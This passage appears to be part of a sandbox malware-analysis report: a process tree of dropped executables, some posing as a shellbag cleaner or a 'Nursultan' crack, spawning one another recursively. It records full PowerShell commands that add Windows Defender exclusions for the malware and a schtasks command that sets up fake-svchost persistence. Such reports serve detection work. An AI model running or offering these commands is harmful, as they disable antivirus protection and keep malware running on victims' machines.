C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"7⤵
- Executes dropped EXE
PID:1304
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"6⤵
- Executes dropped EXE
PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"6⤵
- Executes dropped EXE
PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"5⤵
- Executes dropped EXE
PID:5816 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"6⤵
- Executes dropped EXE
PID:3948 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵
- Executes dropped EXE
PID:5336
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"7⤵
- Executes dropped EXE
PID:5796
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"6⤵
- Executes dropped EXE
PID:5148
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"5⤵
- Executes dropped EXE
PID:5772
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"5⤵
- Executes dropped EXE
PID:5808
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"4⤵
- Executes dropped EXE
PID:4100 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"5⤵
- Executes dropped EXE
PID:4936 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"6⤵
- Executes dropped EXE
PID:5948 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵
- Executes dropped EXE
PID:724 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:3904
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"8⤵PID:4880
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"7⤵
- Executes dropped EXE
PID:5176
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"6⤵
- Executes dropped EXE
PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"5⤵
- Executes dropped EXE
PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"4⤵
- Executes dropped EXE
PID:4308
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"4⤵
- Executes dropped EXE
PID:3848
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"3⤵
- Executes dropped EXE
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"4⤵
- Executes dropped EXE
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"5⤵
- Executes dropped EXE
PID:5952 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"6⤵
- Executes dropped EXE
PID:5764 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵
- Executes dropped EXE
PID:3688 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"9⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"8⤵PID:5168
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"7⤵
- Executes dropped EXE
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"6⤵
- Executes dropped EXE
PID:5628
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"5⤵
- Executes dropped EXE
PID:5980
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"4⤵
- Executes dropped EXE
PID:2140
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:4124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nursultan Beta.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:6016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nursultan Crack'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nursultan Crack'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2924
-
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"3⤵
- Executes dropped EXE
PID:4644
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner (1).exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2112 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner (1).exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner (1).exe"2⤵
- Executes dropped EXE
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"3⤵
- Executes dropped EXE
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gay.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'gay.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:6140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5720
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4444
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sites.bat'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sites.bat" "2⤵
- Drops file in Drivers directory
PID:1732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\4.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"2⤵
- Executes dropped EXE
- Modifies registry class
PID:3836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:4776
-
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4008
-
C:\ProgramData\svhost.exeC:\ProgramData\svhost.exe1⤵PID:5824
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:5784
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f8 0x4c81⤵PID:5968
-
C:\Users\Admin\Desktop\SWA V1.5\SWA V1.5.exe"C:\Users\Admin\Desktop\SWA V1.5\SWA V1.5.exe"1⤵
- Adds Run key to start application
PID:2460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5684
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"2⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\abayounda.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\abayounda.exe"C:\Users\Admin\AppData\Local\Temp\abayounda.exe"2⤵PID:5464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\нужно2.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5684
-
-
-
C:\Users\Admin\AppData\Local\Temp\нужно2.exe"C:\Users\Admin\AppData\Local\Temp\нужно2.exe"2⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\компоненты.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:4440
-
-
C:\Users\Admin\AppData\Local\Temp\компоненты.exe"C:\Users\Admin\AppData\Local\Temp\компоненты.exe"2⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\компоненты.exe"C:\Users\Admin\AppData\Local\Temp\компоненты.exe"3⤵
- Loads dropped DLL
PID:916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:4764
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\нужно.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5196
-
-
C:\Users\Admin\AppData\Local\Temp\нужно.exe"C:\Users\Admin\AppData\Local\Temp\нужно.exe"2⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rustme.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5184
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"2⤵PID:1320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\build.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:4360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5540
-
-
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"2⤵PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"2⤵PID:3984
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"3⤵PID:5844
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"3⤵PID:2892
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"3⤵PID:3508
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"4⤵PID:4912
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"4⤵PID:2160
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"4⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"5⤵PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"5⤵PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"5⤵PID:4952
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"6⤵PID:624
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"6⤵PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"6⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"7⤵PID:2648
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"7⤵PID:64
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"7⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"8⤵PID:740
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"8⤵PID:3080
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"8⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"9⤵PID:3596
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"9⤵PID:3892
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"9⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"10⤵PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"10⤵PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"10⤵PID:1892
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"11⤵PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"11⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"11⤵PID:3896
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"12⤵PID:5308
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"12⤵PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"12⤵PID:408
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"13⤵PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"13⤵PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"13⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"14⤵PID:5208
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"14⤵PID:6112
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"14⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"15⤵PID:436
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"15⤵PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"15⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"16⤵PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"16⤵PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"16⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"17⤵PID:672
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"17⤵PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"17⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"18⤵PID:5708
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"18⤵PID:6060
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"18⤵PID:1368
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"19⤵PID:5196
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"19⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"19⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"20⤵PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"20⤵PID:624
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"20⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"21⤵PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"21⤵PID:5104
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:2228
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:4568
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵
- Checks computer location settings
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:3736
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"31⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"32⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"33⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"34⤵PID:3320
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"35⤵PID:2580
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"36⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"37⤵PID:4268
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"38⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"39⤵PID:4008
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"40⤵PID:392
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"41⤵PID:180
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"41⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"40⤵PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"39⤵PID:4884
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"38⤵PID:5508
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"37⤵PID:2548
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"36⤵PID:4736
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"35⤵PID:6056
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"34⤵PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"33⤵PID:856
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"32⤵PID:2140
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"31⤵PID:2064
-
-
-
